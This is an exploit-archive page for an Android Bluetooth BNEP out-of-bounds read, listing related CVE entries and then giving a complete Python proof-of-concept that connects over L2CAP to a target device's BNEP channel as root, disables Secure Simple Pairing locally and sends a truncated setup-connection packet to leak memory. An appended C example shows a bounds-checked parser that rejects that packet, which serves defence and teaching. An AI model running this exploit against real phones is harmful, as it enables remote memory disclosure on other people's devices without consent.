Android Bluetooth BNEP_SETUP_CONNECTION_REQUEST_MSG Out-of-Bounds Read Exploit
Title | Published | Family |
---|---|---|
Android Bluetooth BNEP BNEP_SETUP_CONNECTION_REQUEST_MSG Out-Of-Bounds Read | 23 Mar 2018 00:00 | packetstorm |
Android Bluetooth BNEP bnep_data_ind() Remote Heap Disclosure | 23 Mar 2018 00:00 | packetstorm |
Android Bluetooth - BNEP bnep_data_ind() Remote Heap Disclosure Exploit | 23 Mar 2018 00:00 | zdt |
Out-of-bounds | 4 Apr 2018 17:29 | prion |
Out-of-bounds | 4 Apr 2018 17:29 | prion |
Out-of-bounds | 4 Apr 2018 17:29 | prion |
Out-of-bounds | 4 Apr 2018 17:29 | prion |
CVE-2017-13258 | 4 Apr 2018 17:29 | cve |
CVE-2017-13262 | 4 Apr 2018 17:29 | cve |
CVE-2017-13260 | 4 Apr 2018 17:29 | cve |
```python
import os
import sys
import struct

import bluetooth  # PyBluez

BNEP_PSM = 15
BNEP_FRAME_CONTROL = 0x01

# Control types (parsed by bnep_process_control_packet() in bnep_utils.cc)
BNEP_SETUP_CONNECTION_REQUEST_MSG = 0x01


def oob_read(src_bdaddr, dst):
    # Open an L2CAP channel to the BNEP PSM on the target
    bnep = bluetooth.BluetoothSocket(bluetooth.L2CAP)
    bnep.settimeout(5)
    bnep.bind((src_bdaddr, 0))
    print('Connecting to BNEP...')
    bnep.connect((dst, BNEP_PSM))
    bnep.settimeout(1)
    print("Triggering OOB read (you may need a debugger to verify that it's actually happening)...")

    # This crafted BNEP packet just contains the BNEP_FRAME_CONTROL frame type,
    # plus the BNEP_SETUP_CONNECTION_REQUEST_MSG control type.
    # It doesn't include the 'len' field, therefore it is read from out of bounds
    bnep.send(struct.pack('<BB', BNEP_FRAME_CONTROL, BNEP_SETUP_CONNECTION_REQUEST_MSG))
    try:
        data = bnep.recv(3)
    except bluetooth.btcommon.BluetoothError:
        data = ''

    if data:
        print('%r' % data)
    else:
        print('[No data]')

    print('Closing connection.')
    bnep.close()


def main(src_hci, dst):
    # Disable Secure Simple Pairing on the local adapter and drop any
    # existing connection to the target before connecting to BNEP
    os.system('hciconfig %s sspmode 0' % (src_hci,))
    os.system('hcitool dc %s' % (dst,))
    oob_read(src_hci, dst)


if __name__ == '__main__':
    if len(sys.argv) < 3:
        print('Usage: python bnep02.py <src-bdaddr> <dst-bdaddr>')
    else:
        if os.getuid():
            print('Error: This script must be run as root.')
        else:
            main(sys.argv[1], sys.argv[2])

# 0day.today [2018-04-11] #
```
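The PoC's comment describes a parser that reads the `len` field without first checking that any bytes remain in the packet. The following is an added example of a bounds-checked parse of the same message, not code from this page or from Android's `bnep_utils.cc`; `parse_setup_request`, `struct setup_req` and the `PARSE_*` codes are hypothetical names. It assumes the BNEP setup-request layout of a one-byte UUID size (2, 4 or 16) followed by the destination and then the source service UUID.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define BNEP_FRAME_CONTROL                0x01
#define BNEP_SETUP_CONNECTION_REQUEST_MSG 0x01

enum { PARSE_OK = 0, PARSE_TRUNCATED = -1, PARSE_BAD_UUID_LEN = -2, PARSE_NOT_SETUP_REQ = -3 };

struct setup_req {            /* hypothetical result type for this example */
    uint8_t uuid_len;         /* size of each UUID: 2, 4 or 16 bytes */
    const uint8_t *dst_uuid;  /* points into the caller's buffer */
    const uint8_t *src_uuid;
};

/* Hypothetical parser: every read is preceded by a check against the bytes
 * remaining in the L2CAP payload, so nothing past pkt[pkt_len-1] is touched. */
int parse_setup_request(const uint8_t *pkt, size_t pkt_len, struct setup_req *out)
{
    size_t rem = pkt_len;
    if (rem < 2) return PARSE_TRUNCATED;              /* frame type + control type */
    if ((pkt[0] & 0x7f) != BNEP_FRAME_CONTROL ||      /* top bit is the extension flag */
        pkt[1] != BNEP_SETUP_CONNECTION_REQUEST_MSG)
        return PARSE_NOT_SETUP_REQ;
    pkt += 2; rem -= 2;

    if (rem < 1) return PARSE_TRUNCATED;              /* 'len' absent: the PoC's 2-byte packet */
    uint8_t len = *pkt++; rem--;
    if (len != 2 && len != 4 && len != 16) return PARSE_BAD_UUID_LEN;
    if (rem < 2u * len) return PARSE_TRUNCATED;       /* destination + source UUID */

    out->uuid_len = len;
    out->dst_uuid = pkt;
    out->src_uuid = pkt + len;
    return PARSE_OK;
}

int main(void)
{
    /* Constructed sample payloads, not captured traffic. */
    const uint8_t no_len[]   = { 0x01, 0x01 };
    const uint8_t short_id[] = { 0x01, 0x01, 0x02, 0x11, 0x16, 0x11 };
    const uint8_t valid[]    = { 0x01, 0x01, 0x02, 0x11, 0x16, 0x11, 0x15 };
    struct setup_req r;
    printf("no_len=%d short=%d valid=%d\n",
           parse_setup_request(no_len, sizeof no_len, &r),
           parse_setup_request(short_id, sizeof short_id, &r),
           parse_setup_request(valid, sizeof valid, &r));
    return 0;
}
```

The two-byte payload sent by the PoC is rejected as truncated before `len` is dereferenced, and a declared UUID size that the remaining bytes cannot cover is rejected the same way.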